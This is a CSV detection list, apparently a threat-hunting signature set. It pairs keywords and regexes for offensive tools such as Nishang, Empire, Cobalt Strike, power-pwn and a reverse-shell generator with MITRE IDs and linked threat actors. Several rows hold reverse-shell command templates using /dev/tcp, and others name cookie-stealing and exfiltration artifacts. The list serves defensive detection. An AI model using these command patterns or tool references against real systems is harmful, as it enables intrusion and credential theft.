"*Run-EXEonRemote*",".{0,1000}Run\-EXEonRemote.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","57712"
"*Run-EXEonRemote.ps1*",".{0,1000}Run\-EXEonRemote\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","57713"
"*RunExfil-78740706-9DEC-EC11-BB3D-0022482CA4A7.json*",".{0,1000}RunExfil\-78740706\-9DEC\-EC11\-BB3D\-0022482CA4A7\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","57714"
"*runFakeTerminal*",".{0,1000}runFakeTerminal.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","57715"
"*run-hiphp-tk.sh*",".{0,1000}run\-hiphp\-tk\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","57716"
"*Running elusiveMice 'BEACON_RDLL_GENERATE*",".{0,1000}Running\selusiveMice\s\'BEACON_RDLL_GENERATE.{0,1000}","offensive_tool_keyword","ElusiveMice","Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind","T1620 - T1055.012 - T1202","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/mgeeky/ElusiveMice","1","0","#content","N/A","10","5","449","78","2023-07-12T17:54:07Z","2021-08-27T19:22:20Z","57717"
"*Running final exploit packet*",".{0,1000}Running\sfinal\sexploit\spacket.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","57718"
"*Running final exploit packet*",".{0,1000}Running\sfinal\sexploit\spacket.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","57719"
"*Running hijacking process*",".{0,1000}Running\shijacking\sprocess.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","57720"
"*Running lolMiner from *",".{0,1000}Running\slolMiner\sfrom\s.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","57721"
"*Running password spray against %d users*",".{0,1000}Running\spassword\sspray\sagainst\s\%d\susers.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","0","#content","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","57722"
"*running SharpHound*",".{0,1000}running\sSharpHound.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","57723"
"*Running the exploit be patient................................*",".{0,1000}Running\sthe\sexploit\sbe\spatient\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/chaudharyarjun/LooneyPwner","1","0","#content #linux","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z","57724"
"*Running: netcat *",".{0,1000}Running\:\snetcat\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#content #linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","57725"
"*RunOF.exe -*",".{0,1000}RunOF\.exe\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","0","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","57726"
"*RunOF.Internals*",".{0,1000}RunOF\.Internals.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","1","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","57727"
"*run-pilot -targetIP *",".{0,1000}run\-pilot\s\-targetIP\s.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","N/A","9","1","79","7","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z","57728"
"*RunRansomware-76740706-9DEC-EC11-BB3D-0022482CA4A7.json*",".{0,1000}RunRansomware\-76740706\-9DEC\-EC11\-BB3D\-0022482CA4A7\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","57729"
"*Runs a powershell command while attempting to bypass AMSI*",".{0,1000}Runs\sa\spowershell\scommand\swhile\sattempting\sto\sbypass\sAMSI.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","57730"
"*runShellcode*",".{0,1000}runShellcode.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","N/A","10","10","1109","180","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z","57733"
"*runshellcode.asm*",".{0,1000}runshellcode\.asm.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57734"
"*runshellcode.exe*",".{0,1000}runshellcode\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57735"
"*runshellcode.o*",".{0,1000}runshellcode\.o.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57736"
"*RunStealCookie-8B5C57DA-F404-ED11-82E4-0022481BF843.json*",".{0,1000}RunStealCookie\-8B5C57DA\-F404\-ED11\-82E4\-0022481BF843\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","57737"
"*RunStealPowerAutomateToken-8C5C57DA-F404-ED11-82E4-0022481BF843.json*",".{0,1000}RunStealPowerAutomateToken\-8C5C57DA\-F404\-ED11\-82E4\-0022481BF843\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","57738"
"*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* /bin/bash""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s\/bin\/bash\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57739"
"*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* /bin/sh""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s\/bin\/sh\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57740"
"*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* bash""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\sbash\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57741"
"*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* cmd""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\scmd\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57742"
"*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* powershell""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\spowershell\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57743"
"*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* pwsh""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\spwsh\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57744"
"*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* zsh""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\szsh\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57745"
"*Runtime.getRuntime().exec(""bash -c* /dev/tcp/*/*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c.{0,1000}\s\/dev\/tcp\/.{0,1000}\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57746"
"*runZeroInc/sshamble*",".{0,1000}runZeroInc\/sshamble.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/runZeroInc/sshamble","1","1","N/A","N/A","10","10","946","74","2025-04-07T15:08:38Z","2024-07-27T20:32:10Z","57749"
"*RuralBishop.csproj*",".{0,1000}RuralBishop\.csproj.{0,1000}","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","N/A","10","2","107","26","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z","57750"
"*RuralBishop.exe*",".{0,1000}RuralBishop\.exe.{0,1000}","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","N/A","10","2","107","26","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z","57751"
"*RuralBishop.sln*",".{0,1000}RuralBishop\.sln.{0,1000}","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","N/A","10","2","107","26","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z","57752"
"*RuralBishop-master*",".{0,1000}RuralBishop\-master.{0,1000}","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","N/A","10","2","107","26","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z","57753"
"*russel.vantuyl@gmail.com*",".{0,1000}russel\.vantuyl\@gmail\.com.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","#email","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","57754"
"*russel.vantuyl@gmail.com*",".{0,1000}russel\.vantuyl\@gmail\.com.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","#email","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","57755"
"*rustbof.cna*",".{0,1000}rustbof\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/wumb0/rust_bof","1","1","N/A","N/A","10","10","262","27","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z","57756"
"*rustcat-3.0.0.zip*",".{0,1000}rustcat\-3\.0\.0\.zip.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","57757"
"*rusthound * --zip --ldaps --adcs --old-bloodhound*",".{0,1000}rusthound\s.{0,1000}\s\-\-zip\s\-\-ldaps\s\-\-adcs\s\-\-old\-bloodhound.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57774"
"*rusthound *--domain*",".{0,1000}rusthound\s.{0,1000}\-\-domain.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","57775"
